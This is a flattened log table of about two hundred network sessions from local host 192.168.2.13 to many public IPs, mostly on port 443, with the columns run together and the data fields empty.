                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10284192.168.2.1333218213.235.105.80443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10285192.168.2.135760661.151.194.189443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10286192.168.2.133493652.252.55.149443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10287192.168.2.1349574111.155.178.225443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10288192.168.2.1342610119.132.204.191443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10289192.168.2.1354602160.132.8.123443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10290192.168.2.135324898.53.203.124443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10291192.168.2.1341628202.142.151.80443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10292192.168.2.133673650.222.37.250443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10293192.168.2.1348844174.136.129.239443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10294192.168.2.1348654159.181.14.93443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10295192.168.2.134826431.236.166.31443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10296192.168.2.1337342122.58.7.197443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10297192.168.2.1341612186.172.160.169443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10298192.168.2.133998090.79.198.214443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10299192.168.2.1354314158.235.160.217443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10300192.168.2.1346790164.235.116.209443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10301192.168.2.135699063.182.125.103443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10302192.168.2.134415871.52.75.133443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10303192.168.2.1345276134.38.252.241443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10304192.168.2.133687246.192.96.63443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10305192.168.2.135192696.62.115.226443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10306192.168.2.1335116155.204.68.123443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10307192.168.2.135423432.208.4.120443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10308192.168.2.1336658115.93.144.43443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10309192.168.2.135074069.249.167.51443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10310192.168.2.1336806195.131.241.68443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10311192.168.2.1339594178.142.11.36443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10312192.168.2.135458223.141.18.37443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10313192.168.2.1342850159.119.144.215443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10314192.168.2.1345232175.123.93.21443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10315192.168.2.1354996165.179.98.254443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10316192.168.2.135767692.158.71.181443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10317192.168.2.1345038104.117.28.36443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10318192.168.2.135726618.159.62.46443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10319192.168.2.1336878176.241.140.102443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10320192.168.2.1345530191.167.161.74443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10321192.168.2.1359034159.36.26.118443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10322192.168.2.1338432103.68.119.204443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10323192.168.2.135400889.48.213.116443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10324192.168.2.1335920183.118.25.85443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10325192.168.2.133644067.138.145.61443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10326192.168.2.135576414.209.102.181443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10327192.168.2.1341936204.79.47.223443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10328192.168.2.1340676112.75.147.252443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10329192.168.2.1334486218.255.142.135443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10330192.168.2.1358732135.232.59.129443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10331192.168.2.1357460161.114.54.21443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10332192.168.2.135730286.173.184.190443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10333192.168.2.135693290.157.234.128443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10334192.168.2.133988239.65.127.151443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10335192.168.2.134956674.197.196.209443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10336192.168.2.1343198136.81.236.11443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10337192.168.2.1359314185.34.16.181443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10338192.168.2.1343992195.238.236.228443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10339192.168.2.1358880133.175.243.198443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10340192.168.2.135754072.26.205.26443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10341192.168.2.1356662118.70.184.86443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10342192.168.2.135354283.139.86.31443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10343192.168.2.1334418198.165.47.128443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10344192.168.2.1349230206.18.214.232443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10345192.168.2.1352962210.172.255.64443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10346192.168.2.1333486178.69.26.211443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10347192.168.2.1336714105.140.222.54443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10348192.168.2.134512881.95.99.128443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10349192.168.2.1346182176.232.123.24443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10350192.168.2.1360748117.19.99.105443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10351192.168.2.135179071.110.50.80443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10352192.168.2.136084442.84.73.4443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10353192.168.2.1358286149.241.94.233443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10354192.168.2.134467463.134.7.58443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10355192.168.2.1345262161.70.112.63443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10356192.168.2.1336688145.145.50.48443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10357192.168.2.13464009.4.178.228443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10358192.168.2.135671696.168.128.126443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10359192.168.2.134573853.140.67.62443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10360192.168.2.1350924146.132.13.36443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10361192.168.2.134758651.237.195.160443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10362192.168.2.1336324104.171.20.209443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10363192.168.2.134084614.229.99.163443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10364192.168.2.1341122207.84.132.243443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10365192.168.2.1352694102.104.0.149443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10366192.168.2.1338446164.40.209.178443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10367192.168.2.1341288198.152.110.6443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10368192.168.2.1349462149.215.46.140443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10369192.168.2.134134471.98.19.10443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10370192.168.2.1338104190.80.26.178443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10371192.168.2.1340772167.156.16.98443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10372192.168.2.135886880.134.10.223443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10373192.168.2.1359142197.171.150.70443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10374192.168.2.1341476213.181.164.161443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10375192.168.2.1356878165.160.154.207443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10376192.168.2.135354484.84.252.230443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10377192.168.2.1339548113.124.115.18443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10378192.168.2.1356524158.18.136.127443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10379192.168.2.134109276.58.31.174443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10380192.168.2.1340958108.60.150.236443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10381192.168.2.133341664.191.142.77443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10382192.168.2.1355368220.131.243.205443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10383192.168.2.1357592199.65.70.207443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10384192.168.2.135194048.101.159.236443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10385192.168.2.135594057.152.36.92443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10386192.168.2.1355050160.91.21.160443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10387192.168.2.133650292.240.115.53443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10388192.168.2.135483650.82.89.8443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10389192.168.2.1355836113.137.136.138443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10390192.168.2.1359016186.8.107.175443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10391192.168.2.1358660187.27.219.169443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10392192.168.2.136081245.223.62.168080
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10393192.168.2.134688413.117.89.57443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10394192.168.2.134939041.64.4.9443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10395192.168.2.1360146146.30.45.60443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10396192.168.2.135382662.176.228.232443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10397192.168.2.135127494.131.156.175443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10398192.168.2.1355670219.119.94.137443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10399192.168.2.1359410211.240.110.116443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10400192.168.2.1359594172.91.229.35443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10401192.168.2.1352078167.76.2.137443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10402192.168.2.1357456193.110.84.161443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10403192.168.2.133887842.197.48.100443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10404192.168.2.1343514203.167.122.214443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10405192.168.2.1347068152.137.233.180443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10406192.168.2.135487668.136.49.95443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10407192.168.2.1346694142.164.50.8443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10408192.168.2.134039636.239.98.64443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10409192.168.2.134363069.211.41.79443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10410192.168.2.135014472.174.51.42443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10411192.168.2.1351114149.27.149.193443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10412192.168.2.1358210185.219.27.221443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10413192.168.2.135336858.131.194.211443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10414192.168.2.1336868111.81.85.58443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10415192.168.2.1353564160.78.17.49443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10416192.168.2.135879283.152.69.137443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10417192.168.2.134533439.110.162.8443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10418192.168.2.133454875.60.62.237443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10419192.168.2.1333936176.141.171.179443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10420192.168.2.133777686.229.53.31443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10421192.168.2.1341778197.72.228.230443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10422192.168.2.1342124157.75.232.133443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10423192.168.2.1356184149.195.77.129443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10424192.168.2.134721677.37.135.117443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10425192.168.2.1339458146.231.180.201443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10426192.168.2.1334364150.231.254.176443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10427192.168.2.1360526181.138.104.115443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10428192.168.2.134232465.239.186.39443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10429192.168.2.1336564217.100.186.90443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10430192.168.2.1336954178.64.99.64443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10431192.168.2.1348300111.255.8.122443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10432192.168.2.135114461.227.135.6443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10433192.168.2.134005414.161.84.171443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10434192.168.2.1339352198.65.106.42443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10435192.168.2.1355624160.129.6.233443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10436192.168.2.1335750164.128.208.44443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10437192.168.2.1345496155.72.217.244443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10438192.168.2.1359018194.233.116.47443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10439192.168.2.1348288124.167.57.156443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10440192.168.2.1343706169.14.53.54443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10441192.168.2.1346064110.180.130.249443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10442192.168.2.1340434162.123.22.190443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10443192.168.2.1359604130.97.166.156443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10444192.168.2.1340786134.71.136.39443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10445192.168.2.135980045.84.199.44443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10446192.168.2.1333808217.60.218.158443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10447192.168.2.135019264.136.28.89443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10448192.168.2.1338082222.3.22.236443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10449192.168.2.1338788167.45.243.197443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10450192.168.2.1358224124.216.244.252443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10451192.168.2.1346690116.72.56.201443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10452192.168.2.1348958176.12.176.233443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10453192.168.2.135292681.131.77.15443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10454192.168.2.1356136135.22.244.147443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10455192.168.2.1360168184.120.18.66443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10456192.168.2.135023882.59.1.89443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10457192.168.2.1342448118.191.252.66443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10458192.168.2.133345477.80.30.196443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10459192.168.2.1352718195.128.186.89443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10460192.168.2.133741445.75.138.139443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10461192.168.2.1334870223.6.194.192443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10462192.168.2.1350058136.164.226.184443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10463192.168.2.1349654207.199.182.101443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10464192.168.2.133762243.146.135.27443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10465192.168.2.1348800142.47.216.109443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10466192.168.2.134126620.72.162.185443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10467192.168.2.1354084190.98.16.64443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10468192.168.2.1360966177.147.194.229443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10469192.168.2.134316820.161.234.68443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10470192.168.2.1352152107.247.64.175443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10471192.168.2.1347820175.94.64.70443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10472192.168.2.133379260.124.200.49443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10473192.168.2.135678838.234.226.121443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10474192.168.2.134534853.71.67.116443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10475192.168.2.1332918110.203.113.89443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10476192.168.2.13335385.206.37.35443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10477192.168.2.1334586184.74.88.203443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10478192.168.2.1359600190.123.57.28443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10479192.168.2.1357520191.83.33.181443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10480192.168.2.134765275.246.248.214443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10481192.168.2.1342862199.229.247.22443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10482192.168.2.1337848170.74.232.54443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10483192.168.2.135144066.245.21.29443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10484192.168.2.134947449.0.176.234443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10485192.168.2.1358116198.79.14.32443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10486192.168.2.1360302219.174.66.1443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10487192.168.2.1353400111.81.253.27443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10488192.168.2.1347676192.36.104.3443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10489192.168.2.135150688.189.15.202443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10490192.168.2.1339966180.19.46.95443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10491192.168.2.1354598211.163.228.102443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10492192.168.2.1358974102.140.139.207443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10493192.168.2.134166452.107.98.122443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10494192.168.2.1356790187.154.78.131443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10495192.168.2.135063676.136.115.179443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
